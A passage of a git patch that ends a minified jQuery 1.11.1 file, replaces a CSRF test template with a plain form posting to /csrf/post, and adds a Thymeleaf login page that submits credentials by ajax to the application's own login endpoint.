type='checkbox'/>",d=b.getElementsByTagName("a")[0],c=y.createElement("select"),e=c.appendChild(y.createElement("option")),a=b.getElementsByTagName("input")[0],d.style.cssText="top:1px",k.getSetAttribute="t"!==b.className,k.style=/top/.test(d.getAttribute("style")),k.hrefNormalized="/a"===d.getAttribute("href"),k.checkOn=!!a.value,k.optSelected=e.selected,k.enctype=!!y.createElement("form").enctype,c.disabled=!0,k.optDisabled=!e.disabled,a=y.createElement("input"),a.setAttribute("value",""),k.input=""===a.getAttribute("value"),a.value="t",a.setAttribute("type","radio"),k.radioValue="t"===a.value}();var lc=/\r/g;m.fn.extend({val:function(a){var b,c,d,e=this[0];{if(arguments.length)return d=m.isFunction(a),this.each(function(c){var e;1===this.nodeType&&(e=d?a.call(this,c,m(this).val()):a,null==e?e="":"number"==typeof e?e+="":m.isArray(e)&&(e=m.map(e,function(a){return null==a?"":a+""})),b=m.valHooks[this.type]||m.valHooks[this.nodeName.toLowerCase()],b&&"set"in b&&void 0!==b.set(this,e,"value")||(this.value=e))});if(e)return b=m.valHooks[e.type]||m.valHooks[e.nodeName.toLowerCase()],b&&"get"in b&&void 0!==(c=b.get(e,"value"))?c:(c=e.value,"string"==typeof c?c.replace(lc,""):null==c?"":c)}}}),m.extend({valHooks:{option:{get:function(a){var b=m.find.attr(a,"value");return null!=b?b:m.trim(m.text(a))}},select:{get:function(a){for(var b,c,d=a.options,e=a.selectedIndex,f="select-one"===a.type||0>e,g=f?null:[],h=f?e+1:d.length,i=0>e?h:f?e:0;h>i;i++)if(c=d[i],!(!c.selected&&i!==e||(k.optDisabled?c.disabled:null!==c.getAttribute("disabled"))||c.parentNode.disabled&&m.nodeName(c.parentNode,"optgroup"))){if(b=m(c).val(),f)return b;g.push(b)}return g},set:function(a,b){var c,d,e=a.options,f=m.makeArray(b),g=e.length;while(g--)if(d=e[g],m.inArray(m.valHooks.option.get(d),f)>=0)try{d.selected=c=!0}catch(h){d.scrollHeight}else d.selected=!1;return c||(a.selectedIndex=-1),e}}}}),m.each(["radio","checkbox"],function(){m.valHooks[this]={set:function(a,b){return m.isArray(b)?a.checked=m.inArray(m(a).val(),b)>=0:void 0}},k.checkOn||(m.valHooks[this].get=function(a){return null===a.getAttribute("value")?"on":a.value})});var mc,nc,oc=m.expr.attrHandle,pc=/^(?:checked|selected)$/i,qc=k.getSetAttribute,rc=k.input;m.fn.extend({attr:function(a,b){return V(this,m.attr,a,b,arguments.length>1)},removeAttr:function(a){return this.each(function(){m.removeAttr(this,a)})}}),m.extend({attr:function(a,b,c){var d,e,f=a.nodeType;if(a&&3!==f&&8!==f&&2!==f)return typeof a.getAttribute===K?m.prop(a,b,c):(1===f&&m.isXMLDoc(a)||(b=b.toLowerCase(),d=m.attrHooks[b]||(m.expr.match.bool.test(b)?nc:mc)),void 0===c?d&&"get"in d&&null!==(e=d.get(a,b))?e:(e=m.find.attr(a,b),null==e?void 0:e):null!==c?d&&"set"in d&&void 0!==(e=d.set(a,c,b))?e:(a.setAttribute(b,c+""),c):void m.removeAttr(a,b))},removeAttr:function(a,b){var c,d,e=0,f=b&&b.match(E);if(f&&1===a.nodeType)while(c=f[e++])d=m.propFix[c]||c,m.expr.match.bool.test(c)?rc&&qc||!pc.test(c)?a[d]=!1:a[m.camelCase("default-"+c)]=a[d]=!1:m.attr(a,c,""),a.removeAttribute(qc?c:d)},attrHooks:{type:{set:function(a,b){if(!k.radioValue&&"radio"===b&&m.nodeName(a,"input")){var c=a.value;return a.setAttribute("type",b),c&&(a.value=c),b}}}}}),nc={set:function(a,b,c){return b===!1?m.removeAttr(a,c):rc&&qc||!pc.test(c)?a.setAttribute(!qc&&m.propFix[c]||c,c):a[m.camelCase("default-"+c)]=a[c]=!0,c}},m.each(m.expr.match.bool.source.match(/\w+/g),function(a,b){var c=oc[b]||m.find.attr;oc[b]=rc&&qc||!pc.test(b)?function(a,b,d){var e,f;return d||(f=oc[b],oc[b]=e,e=null!=c(a,b,d)?b.toLowerCase():null,oc[b]=f),e}:function(a,b,c){return c?void 0:a[m.camelCase("default-"+b)]?b.toLowerCase():null}}),rc&&qc||(m.attrHooks.value={set:function(a,b,c){return m.nodeName(a,"input")?void(a.defaultValue=b):mc&&mc.set(a,b,c)}}),qc||(mc={set:function(a,b,c){var d=a.getAttributeNode(c);return d||a.setAttributeNode(d=a.ownerDocument.createAttribute(c)),d.value=b+="","value"===c||b===a.getAttribute(c)?b:void 0}},oc.id=oc.name=oc.coords=function(a,b,c){var d;return c?void 0:(d=a.getAttributeNode(b))&&""!==d.value?d.value:null},m.valHooks.button={get:function(a,b){var c=a.getAttributeNode(b);return c&&c.specified?c.value:void 0},set:mc.set},m.attrHooks.contenteditable={set:function(a,b,c){mc.set(a,""===b?!1:b,c)}},m.each(["width","height"],function(a,b){m.attrHooks[b]={set:function(a,c){return""===c?(a.setAttribute(b,"auto"),c):void 0}}})),k.style||(m.attrHooks.style={get:function(a){return a.style.cssText||void 0},set:function(a,b){return a.style.cssText=b+""}});var sc=/^(?:input|select|textarea|button|object)$/i,tc=/^(?:a|area)$/i;m.fn.extend({prop:function(a,b){return V(this,m.prop,a,b,arguments.length>1)},removeProp:function(a){return a=m.propFix[a]||a,this.each(function(){try{this[a]=void 0,delete this[a]}catch(b){}})}}),m.extend({propFix:{"for":"htmlFor","class":"className"},prop:function(a,b,c){var d,e,f,g=a.nodeType;if(a&&3!==g&&8!==g&&2!==g)return f=1!==g||!m.isXMLDoc(a),f&&(b=m.propFix[b]||b,e=m.propHooks[b]),void 0!==c?e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:a[b]=c:e&&"get"in e&&null!==(d=e.get(a,b))?d:a[b]},propHooks:{tabIndex:{get:function(a){var b=m.find.attr(a,"tabindex");return b?parseInt(b,10):sc.test(a.nodeName)||tc.test(a.nodeName)&&a.href?0:-1}}}}),k.hrefNormalized||m.each(["href","src"],function(a,b){m.propHooks[b]={get:function(a){return a.getAttribute(b,4)}}}),k.optSelected||(m.propHooks.selected={get:function(a){var b=a.parentNode;return b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex),null}}),m.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){m.propFix[this.toLowerCase()]=this}),k.enctype||(m.propFix.enctype="encoding");var uc=/[\t\r\n\f]/g;m.fn.extend({addClass:function(a){var b,c,d,e,f,g,h=0,i=this.length,j="string"==typeof a&&a;if(m.isFunction(a))return this.each(function(b){m(this).addClass(a.call(this,b,this.className))});if(j)for(b=(a||"").match(E)||[];i>h;h++)if(c=this[h],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(uc," "):" ")){f=0;while(e=b[f++])d.indexOf(" "+e+" ")<0&&(d+=e+" ");g=m.trim(d),c.className!==g&&(c.className=g)}return this},removeClass:function(a){var b,c,d,e,f,g,h=0,i=this.length,j=0===arguments.length||"string"==typeof a&&a;if(m.isFunction(a))return this.each(function(b){m(this).removeClass(a.call(this,b,this.className))});if(j)for(b=(a||"").match(E)||[];i>h;h++)if(c=this[h],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(uc," "):"")){f=0;while(e=b[f++])while(d.indexOf(" "+e+" ")>=0)d=d.replace(" "+e+" "," ");g=a?m.trim(d):"",c.className!==g&&(c.className=g)}return this},toggleClass:function(a,b){var c=typeof a;return"boolean"==typeof b&&"string"===c?b?this.addClass(a):this.removeClass(a):this.each(m.isFunction(a)?function(c){m(this).toggleClass(a.call(this,c,this.className,b),b)}:function(){if("string"===c){var b,d=0,e=m(this),f=a.match(E)||[];while(b=f[d++])e.hasClass(b)?e.removeClass(b):e.addClass(b)}else(c===K||"boolean"===c)&&(this.className&&m._data(this,"__className__",this.className),this.className=this.className||a===!1?"":m._data(this,"__className__")||"")})},hasClass:function(a){for(var b=" "+a+" ",c=0,d=this.length;d>c;c++)if(1===this[c].nodeType&&(" "+this[c].className+" ").replace(uc," ").indexOf(b)>=0)return!0;return!1}}),m.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(a,b){m.fn[b]=function(a,c){return arguments.length>0?this.on(b,null,a,c):this.trigger(b)}}),m.fn.extend({hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)},bind:function(a,b,c){return this.on(a,null,b,c)},unbind:function(a,b){return this.off(a,null,b)},delegate:function(a,b,c,d){return this.on(b,a,c,d)},undelegate:function(a,b,c){return 1===arguments.length?this.off(a,"**"):this.off(b,a||"**",c)}});var vc=m.now(),wc=/\?/,xc=/(,)|(\[|{)|(}|])|"(?:[^"\\\r\n]|\\["\\\/bfnrt]|\\u[\da-fA-F]{4})*"\s*:?|true|false|null|-?(?!0\d)\d+(?:\.\d+|)(?:[eE][+-]?\d+|)/g;m.parseJSON=function(b){if(a.JSON&&a.JSON.parse)return a.JSON.parse(b+"");var c,d=null,e=m.trim(b+"");return e&&!m.trim(e.replace(xc,function(a,b,e,f){return c&&b&&(d=0),0===d?a:(c=e||b,d+=!f-!e,"")}))?Function("return "+e)():m.error("Invalid JSON: "+b)},m.parseXML=function(b){var c,d;if(!b||"string"!=typeof b)return null;try{a.DOMParser?(d=new DOMParser,c=d.parseFromString(b,"text/xml")):(c=new ActiveXObject("Microsoft.XMLDOM"),c.async="false",c.loadXML(b))}catch(e){c=void 0}return c&&c.documentElement&&!c.getElementsByTagName("parsererror").length||m.error("Invalid XML: "+b),c};var yc,zc,Ac=/#.*$/,Bc=/([?&])_=[^&]*/,Cc=/^(.*?):[ \t]*([^\r\n]*)\r?$/gm,Dc=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Ec=/^(?:GET|HEAD)$/,Fc=/^\/\//,Gc=/^([\w.+-]+:)(?:\/\/(?:[^\/?#]*@|)([^\/?#:]*)(?::(\d+)|)|)/,Hc={},Ic={},Jc="*/".concat("*");try{zc=location.href}catch(Kc){zc=y.createElement("a"),zc.href="",zc=zc.href}yc=Gc.exec(zc.toLowerCase())||[];function Lc(a){return function(b,c){"string"!=typeof b&&(c=b,b="*");var d,e=0,f=b.toLowerCase().match(E)||[];if(m.isFunction(c))while(d=f[e++])"+"===d.charAt(0)?(d=d.slice(1)||"*",(a[d]=a[d]||[]).unshift(c)):(a[d]=a[d]||[]).push(c)}}function Mc(a,b,c,d){var e={},f=a===Ic;function g(h){var i;return e[h]=!0,m.each(a[h]||[],function(a,h){var j=h(b,c,d);return"string"!=typeof j||f||e[j]?f?!(i=j):void 0:(b.dataTypes.unshift(j),g(j),!1)}),i}return g(b.dataTypes[0])||!e["*"]&&g("*")}function Nc(a,b){var c,d,e=m.ajaxSettings.flatOptions||{};for(d in b)void 0!==b[d]&&((e[d]?a:c||(c={}))[d]=b[d]);return c&&m.extend(!0,a,c),a}function Oc(a,b,c){var d,e,f,g,h=a.contents,i=a.dataTypes;while("*"===i[0])i.shift(),void 0===e&&(e=a.mimeType||b.getResponseHeader("Content-Type"));if(e)for(g in h)if(h[g]&&h[g].test(e)){i.unshift(g);break}if(i[0]in c)f=i[0];else{for(g in c){if(!i[0]||a.converters[g+" "+i[0]]){f=g;break}d||(d=g)}f=f||d}return f?(f!==i[0]&&i.unshift(f),c[f]):void 0}function Pc(a,b,c,d){var e,f,g,h,i,j={},k=a.dataTypes.slice();if(k[1])for(g in a.converters)j[g.toLowerCase()]=a.converters[g];f=k.shift();while(f)if(a.responseFields[f]&&(c[a.responseFields[f]]=b),!i&&d&&a.dataFilter&&(b=a.dataFilter(b,a.dataType)),i=f,f=k.shift())if("*"===f)f=i;else if("*"!==i&&i!==f){if(g=j[i+" "+f]||j["* "+f],!g)for(e in j)if(h=e.split(" "),h[1]===f&&(g=j[i+" "+h[0]]||j["* "+h[0]])){g===!0?g=j[e]:j[e]!==!0&&(f=h[0],k.unshift(h[1]));break}if(g!==!0)if(g&&a["throws"])b=g(b);else try{b=g(b)}catch(l){return{state:"parsererror",error:g?l:"No conversion from "+i+" to "+f}}}return{state:"success",data:b}}m.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:zc,type:"GET",isLocal:Dc.test(yc[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":Jc,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":m.parseJSON,"text xml":m.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(a,b){return b?Nc(Nc(a,m.ajaxSettings),b):Nc(m.ajaxSettings,a)},ajaxPrefilter:Lc(Hc),ajaxTransport:Lc(Ic),ajax:function(a,b){"object"==typeof a&&(b=a,a=void 0),b=b||{};var c,d,e,f,g,h,i,j,k=m.ajaxSetup({},b),l=k.context||k,n=k.context&&(l.nodeType||l.jquery)?m(l):m.event,o=m.Deferred(),p=m.Callbacks("once memory"),q=k.statusCode||{},r={},s={},t=0,u="canceled",v={readyState:0,getResponseHeader:function(a){var b;if(2===t){if(!j){j={};while(b=Cc.exec(f))j[b[1].toLowerCase()]=b[2]}b=j[a.toLowerCase()]}return null==b?null:b},getAllResponseHeaders:function(){return 2===t?f:null},setRequestHeader:function(a,b){var c=a.toLowerCase();return t||(a=s[c]=s[c]||a,r[a]=b),this},overrideMimeType:function(a){return t||(k.mimeType=a),this},statusCode:function(a){var b;if(a)if(2>t)for(b in a)q[b]=[q[b],a[b]];else v.always(a[v.status]);return this},abort:function(a){var b=a||u;return i&&i.abort(b),x(0,b),this}};if(o.promise(v).complete=p.add,v.success=v.done,v.error=v.fail,k.url=((a||k.url||zc)+"").replace(Ac,"").replace(Fc,yc[1]+"//"),k.type=b.method||b.type||k.method||k.type,k.dataTypes=m.trim(k.dataType||"*").toLowerCase().match(E)||[""],null==k.crossDomain&&(c=Gc.exec(k.url.toLowerCase()),k.crossDomain=!(!c||c[1]===yc[1]&&c[2]===yc[2]&&(c[3]||("http:"===c[1]?"80":"443"))===(yc[3]||("http:"===yc[1]?"80":"443")))),k.data&&k.processData&&"string"!=typeof k.data&&(k.data=m.param(k.data,k.traditional)),Mc(Hc,k,b,v),2===t)return v;h=k.global,h&&0===m.active++&&m.event.trigger("ajaxStart"),k.type=k.type.toUpperCase(),k.hasContent=!Ec.test(k.type),e=k.url,k.hasContent||(k.data&&(e=k.url+=(wc.test(e)?"&":"?")+k.data,delete k.data),k.cache===!1&&(k.url=Bc.test(e)?e.replace(Bc,"$1_="+vc++):e+(wc.test(e)?"&":"?")+"_="+vc++)),k.ifModified&&(m.lastModified[e]&&v.setRequestHeader("If-Modified-Since",m.lastModified[e]),m.etag[e]&&v.setRequestHeader("If-None-Match",m.etag[e])),(k.data&&k.hasContent&&k.contentType!==!1||b.contentType)&&v.setRequestHeader("Content-Type",k.contentType),v.setRequestHeader("Accept",k.dataTypes[0]&&k.accepts[k.dataTypes[0]]?k.accepts[k.dataTypes[0]]+("*"!==k.dataTypes[0]?", "+Jc+"; q=0.01":""):k.accepts["*"]);for(d in k.headers)v.setRequestHeader(d,k.headers[d]);if(k.beforeSend&&(k.beforeSend.call(l,v,k)===!1||2===t))return v.abort();u="abort";for(d in{success:1,error:1,complete:1})v[d](k[d]);if(i=Mc(Ic,k,b,v)){v.readyState=1,h&&n.trigger("ajaxSend",[v,k]),k.async&&k.timeout>0&&(g=setTimeout(function(){v.abort("timeout")},k.timeout));try{t=1,i.send(r,x)}catch(w){if(!(2>t))throw w;x(-1,w)}}else x(-1,"No Transport");function x(a,b,c,d){var j,r,s,u,w,x=b;2!==t&&(t=2,g&&clearTimeout(g),i=void 0,f=d||"",v.readyState=a>0?4:0,j=a>=200&&300>a||304===a,c&&(u=Oc(k,v,c)),u=Pc(k,u,v,j),j?(k.ifModified&&(w=v.getResponseHeader("Last-Modified"),w&&(m.lastModified[e]=w),w=v.getResponseHeader("etag"),w&&(m.etag[e]=w)),204===a||"HEAD"===k.type?x="nocontent":304===a?x="notmodified":(x=u.state,r=u.data,s=u.error,j=!s)):(s=x,(a||!x)&&(x="error",0>a&&(a=0))),v.status=a,v.statusText=(b||x)+"",j?o.resolveWith(l,[r,x,v]):o.rejectWith(l,[v,x,s]),v.statusCode(q),q=void 0,h&&n.trigger(j?"ajaxSuccess":"ajaxError",[v,k,j?r:s]),p.fireWith(l,[v,x]),h&&(n.trigger("ajaxComplete",[v,k]),--m.active||m.event.trigger("ajaxStop")))}return v},getJSON:function(a,b,c){return m.get(a,b,c,"json")},getScript:function(a,b){return m.get(a,void 0,b,"script")}}),m.each(["get","post"],function(a,b){m[b]=function(a,c,d,e){return m.isFunction(c)&&(e=e||d,d=c,c=void 0),m.ajax({url:a,type:b,dataType:e,data:c,success:d})}}),m.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(a,b){m.fn[b]=function(a){return this.on(b,a)}}),m._evalUrl=function(a){return m.ajax({url:a,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})},m.fn.extend({wrapAll:function(a){if(m.isFunction(a))return this.each(function(b){m(this).wrapAll(a.call(this,b))});if(this[0]){var b=m(a,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstChild&&1===a.firstChild.nodeType)a=a.firstChild;return a}).append(this)}return this},wrapInner:function(a){return this.each(m.isFunction(a)?function(b){m(this).wrapInner(a.call(this,b))}:function(){var b=m(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=m.isFunction(a);return this.each(function(c){m(this).wrapAll(b?a.call(this,c):a)})},unwrap:function(){return this.parent().each(function(){m.nodeName(this,"body")||m(this).replaceWith(this.childNodes)}).end()}}),m.expr.filters.hidden=function(a){return a.offsetWidth<=0&&a.offsetHeight<=0||!k.reliableHiddenOffsets()&&"none"===(a.style&&a.style.display||m.css(a,"display"))},m.expr.filters.visible=function(a){return!m.expr.filters.hidden(a)};var Qc=/%20/g,Rc=/\[\]$/,Sc=/\r?\n/g,Tc=/^(?:submit|button|image|reset|file)$/i,Uc=/^(?:input|select|textarea|keygen)/i;function Vc(a,b,c,d){var e;if(m.isArray(b))m.each(b,function(b,e){c||Rc.test(a)?d(a,e):Vc(a+"["+("object"==typeof e?b:"")+"]",e,c,d)});else if(c||"object"!==m.type(b))d(a,b);else for(e in b)Vc(a+"["+e+"]",b[e],c,d)}m.param=function(a,b){var c,d=[],e=function(a,b){b=m.isFunction(b)?b():null==b?"":b,d[d.length]=encodeURIComponent(a)+"="+encodeURIComponent(b)};if(void 0===b&&(b=m.ajaxSettings&&m.ajaxSettings.traditional),m.isArray(a)||a.jquery&&!m.isPlainObject(a))m.each(a,function(){e(this.name,this.value)});else for(c in a)Vc(c,a[c],b,e);return d.join("&").replace(Qc,"+")},m.fn.extend({serialize:function(){return m.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var a=m.prop(this,"elements");return a?m.makeArray(a):this}).filter(function(){var a=this.type;return this.name&&!m(this).is(":disabled")&&Uc.test(this.nodeName)&&!Tc.test(a)&&(this.checked||!W.test(a))}).map(function(a,b){var c=m(this).val();return null==c?null:m.isArray(c)?m.map(c,function(a){return{name:b.name,value:a.replace(Sc,"\r\n")}}):{name:b.name,value:c.replace(Sc,"\r\n")}}).get()}}),m.ajaxSettings.xhr=void 0!==a.ActiveXObject?function(){return!this.isLocal&&/^(get|post|head|put|delete|options)$/i.test(this.type)&&Zc()||$c()}:Zc;var Wc=0,Xc={},Yc=m.ajaxSettings.xhr();a.ActiveXObject&&m(a).on("unload",function(){for(var a in Xc)Xc[a](void 0,!0)}),k.cors=!!Yc&&"withCredentials"in Yc,Yc=k.ajax=!!Yc,Yc&&m.ajaxTransport(function(a){if(!a.crossDomain||k.cors){var b;return{send:function(c,d){var e,f=a.xhr(),g=++Wc;if(f.open(a.type,a.url,a.async,a.username,a.password),a.xhrFields)for(e in a.xhrFields)f[e]=a.xhrFields[e];a.mimeType&&f.overrideMimeType&&f.overrideMimeType(a.mimeType),a.crossDomain||c["X-Requested-With"]||(c["X-Requested-With"]="XMLHttpRequest");for(e in c)void 0!==c[e]&&f.setRequestHeader(e,c[e]+"");f.send(a.hasContent&&a.data||null),b=function(c,e){var h,i,j;if(b&&(e||4===f.readyState))if(delete Xc[g],b=void 0,f.onreadystatechange=m.noop,e)4!==f.readyState&&f.abort();else{j={},h=f.status,"string"==typeof f.responseText&&(j.text=f.responseText);try{i=f.statusText}catch(k){i=""}h||!a.isLocal||a.crossDomain?1223===h&&(h=204):h=j.text?200:404}j&&d(h,i,j,f.getAllResponseHeaders())},a.async?4===f.readyState?setTimeout(b):f.onreadystatechange=Xc[g]=b:b()},abort:function(){b&&b(void 0,!0)}}}});function Zc(){try{return new a.XMLHttpRequest}catch(b){}}function $c(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}m.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(a){return m.globalEval(a),a}}}),m.ajaxPrefilter("script",function(a){void 0===a.cache&&(a.cache=!1),a.crossDomain&&(a.type="GET",a.global=!1)}),m.ajaxTransport("script",function(a){if(a.crossDomain){var b,c=y.head||m("head")[0]||y.documentElement;return{send:function(d,e){b=y.createElement("script"),b.async=!0,a.scriptCharset&&(b.charset=a.scriptCharset),b.src=a.url,b.onload=b.onreadystatechange=function(a,c){(c||!b.readyState||/loaded|complete/.test(b.readyState))&&(b.onload=b.onreadystatechange=null,b.parentNode&&b.parentNode.removeChild(b),b=null,c||e(200,"success"))},c.insertBefore(b,c.firstChild)},abort:function(){b&&b.onload(void 0,!0)}}}});var _c=[],ad=/(=)\?(?=&|$)|\?\?/;m.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var a=_c.pop()||m.expando+"_"+vc++;return this[a]=!0,a}}),m.ajaxPrefilter("json jsonp",function(b,c,d){var e,f,g,h=b.jsonp!==!1&&(ad.test(b.url)?"url":"string"==typeof b.data&&!(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&ad.test(b.data)&&"data");return h||"jsonp"===b.dataTypes[0]?(e=b.jsonpCallback=m.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,h?b[h]=b[h].replace(ad,"$1"+e):b.jsonp!==!1&&(b.url+=(wc.test(b.url)?"&":"?")+b.jsonp+"="+e),b.converters["script json"]=function(){return g||m.error(e+" was not called"),g[0]},b.dataTypes[0]="json",f=a[e],a[e]=function(){g=arguments},d.always(function(){a[e]=f,b[e]&&(b.jsonpCallback=c.jsonpCallback,_c.push(e)),g&&m.isFunction(f)&&f(g[0]),g=f=void 0}),"script"):void 0}),m.parseHTML=function(a,b,c){if(!a||"string"!=typeof a)return null;"boolean"==typeof b&&(c=b,b=!1),b=b||y;var d=u.exec(a),e=!c&&[];return d?[b.createElement(d[1])]:(d=m.buildFragment([a],b,e),e&&e.length&&m(e).remove(),m.merge([],d.childNodes))};var bd=m.fn.load;m.fn.load=function(a,b,c){if("string"!=typeof a&&bd)return bd.apply(this,arguments);var d,e,f,g=this,h=a.indexOf(" ");return h>=0&&(d=m.trim(a.slice(h,a.length)),a=a.slice(0,h)),m.isFunction(b)?(c=b,b=void 0):b&&"object"==typeof b&&(f="POST"),g.length>0&&m.ajax({url:a,type:f,dataType:"html",data:b}).done(function(a){e=arguments,g.html(d?m("<div>").append(m.parseHTML(a)).find(d):a)}).complete(c&&function(a,b){g.each(c,e||[a.responseText,b,a])}),this},m.expr.filters.animated=function(a){return m.grep(m.timers,function(b){return a===b.elem}).length};var cd=a.document.documentElement;function dd(a){return m.isWindow(a)?a:9===a.nodeType?a.defaultView||a.parentWindow:!1}m.offset={setOffset:function(a,b,c){var d,e,f,g,h,i,j,k=m.css(a,"position"),l=m(a),n={};"static"===k&&(a.style.position="relative"),h=l.offset(),f=m.css(a,"top"),i=m.css(a,"left"),j=("absolute"===k||"fixed"===k)&&m.inArray("auto",[f,i])>-1,j?(d=l.position(),g=d.top,e=d.left):(g=parseFloat(f)||0,e=parseFloat(i)||0),m.isFunction(b)&&(b=b.call(a,c,h)),null!=b.top&&(n.top=b.top-h.top+g),null!=b.left&&(n.left=b.left-h.left+e),"using"in b?b.using.call(a,n):l.css(n)}},m.fn.extend({offset:function(a){if(arguments.length)return void 0===a?this:this.each(function(b){m.offset.setOffset(this,a,b)});var b,c,d={top:0,left:0},e=this[0],f=e&&e.ownerDocument;if(f)return b=f.documentElement,m.contains(b,e)?(typeof e.getBoundingClientRect!==K&&(d=e.getBoundingClientRect()),c=dd(f),{top:d.top+(c.pageYOffset||b.scrollTop)-(b.clientTop||0),left:d.left+(c.pageXOffset||b.scrollLeft)-(b.clientLeft||0)}):d},position:function(){if(this[0]){var a,b,c={top:0,left:0},d=this[0];return"fixed"===m.css(d,"position")?b=d.getBoundingClientRect():(a=this.offsetParent(),b=this.offset(),m.nodeName(a[0],"html")||(c=a.offset()),c.top+=m.css(a[0],"borderTopWidth",!0),c.left+=m.css(a[0],"borderLeftWidth",!0)),{top:b.top-c.top-m.css(d,"marginTop",!0),left:b.left-c.left-m.css(d,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||cd;while(a&&!m.nodeName(a,"html")&&"static"===m.css(a,"position"))a=a.offsetParent;return a||cd})}}),m.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(a,b){var c=/Y/.test(b);m.fn[a]=function(d){return V(this,function(a,d,e){var f=dd(a);return void 0===e?f?b in f?f[b]:f.document.documentElement[d]:a[d]:void(f?f.scrollTo(c?m(f).scrollLeft():e,c?e:m(f).scrollTop()):a[d]=e)},a,d,arguments.length,null)}}),m.each(["top","left"],function(a,b){m.cssHooks[b]=Lb(k.pixelPosition,function(a,c){return c?(c=Jb(a,b),Hb.test(c)?m(a).position()[b]+"px":c):void 0})}),m.each({Height:"height",Width:"width"},function(a,b){m.each({padding:"inner"+a,content:b,"":"outer"+a},function(c,d){m.fn[d]=function(d,e){var f=arguments.length&&(c||"boolean"!=typeof d),g=c||(d===!0||e===!0?"margin":"border");return V(this,function(b,c,d){var e;return m.isWindow(b)?b.document.documentElement["client"+a]:9===b.nodeType?(e=b.documentElement,Math.max(b.body["scroll"+a],e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?m.css(b,c,g):m.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),m.fn.size=function(){return this.length},m.fn.andSelf=m.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return m});var ed=a.jQuery,fd=a.$;return m.noConflict=function(b){return a.$===m&&(a.$=fd),b&&a.jQuery===m&&(a.jQuery=ed),m},typeof b===K&&(a.jQuery=a.$=m),m});
\ No newline at end of file
diff --git a/src/main/resources/templates/csrfTest.html b/src/main/resources/templates/csrfTest.html
deleted file mode 100644
index b2916c8d..00000000
--- a/src/main/resources/templates/csrfTest.html
+++ /dev/null
@@ -1,27 +0,0 @@
-
-<html xmlns:th="http://www.thymeleaf.org" lang="en">
-
-<body>
-
-
-<div>
-    <form name="f" th:action="@{/csrf/post}" method="post">
-        <input type="text" name="input" />
-        <input type="submit" value="Submit" />
-    </form>
-</div>
-
-
-</body>
-
-
-<!-- <input type="hidden" th:name="${_csrf.parameterName}" th:value="${_csrf.token}" />  -->
-
-<!--<script>-->
-    <!--window.csrfToken = {-->
-        <!--tokenName: "${_csrf.parameterName}",-->
-        <!--tokenValue: "${_csrf.token}"-->
-    <!--};-->
-<!--</script>-->
-
-</html>
\ No newline at end of file
diff --git a/src/main/resources/templates/form.html b/src/main/resources/templates/form.html
new file mode 100644
index 00000000..3c98b503
--- /dev/null
+++ b/src/main/resources/templates/form.html
@@ -0,0 +1,19 @@
+
+<html xmlns:th="http://www.thymeleaf.org" lang="en">
+
+<body>
+
+
+<div>
+    <form name="f" th:action="@{/csrf/post}" method="post">
+        <input type="text" name="input" />
+        <input type="submit" value="Submit" />
+    </form>
+</div>
+
+
+</body>
+
+
+
+</html>
\ No newline at end of file
diff --git a/src/main/resources/templates/login.html b/src/main/resources/templates/login.html
new file mode 100644
index 00000000..dddf2604
--- /dev/null
+++ b/src/main/resources/templates/login.html
@@ -0,0 +1,41 @@
+<!DOCTYPE html>
+<html xmlns:th="http://www.thymeleaf.org">
+<head>
+    <meta charset="UTF-8" />
+    <title>Login</title>
+    <link rel="stylesheet" th:href="@{/css/login.css}" type="text/css" />
+    <script th:src="@{/js/jquery-1.11.1.min.js}"></script>
+</head>
+<body>
+<div class="login-page">
+    <div class="form">
+        <input type="text" placeholder="Username" name="username" required="required"/>
+        <input type="password" placeholder="Password" name="password" required="required"/>
+        <p><input type="checkbox" name="remember-me" />RememberMe</p>
+        <button onclick="login()">Login</button>
+    </div>
+</div>
+</body>
+<script th:inline="javascript">
+    var ctx = [[@{/}]];
+        function login() {
+            var username = $("input[name='username']").val();
+            var password = $("input[name='password']").val();
+            var remember_me =$("input[name='remember-me']").is(':checked');
+            $.ajax({
+                type: "post",
+                url: ctx + "login",
+                data: {"username": username, "password": password, "remember-me": remember_me},
+                dataType: "json",
+                success: function (r) {
+                    if (r.code == 1) {
+                        alert(r.message);
+                        location.href = ctx + 'index';
+                    } else {
+                        alert(r.message);
+                    }
+                }
+            });
+        }
+</script>
+</html>
\ No newline at end of file

From 3e06b52d2a3d2bc12aa07a23c664d292b46202d0 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 22 Jul 2019 11:44:34 +0800
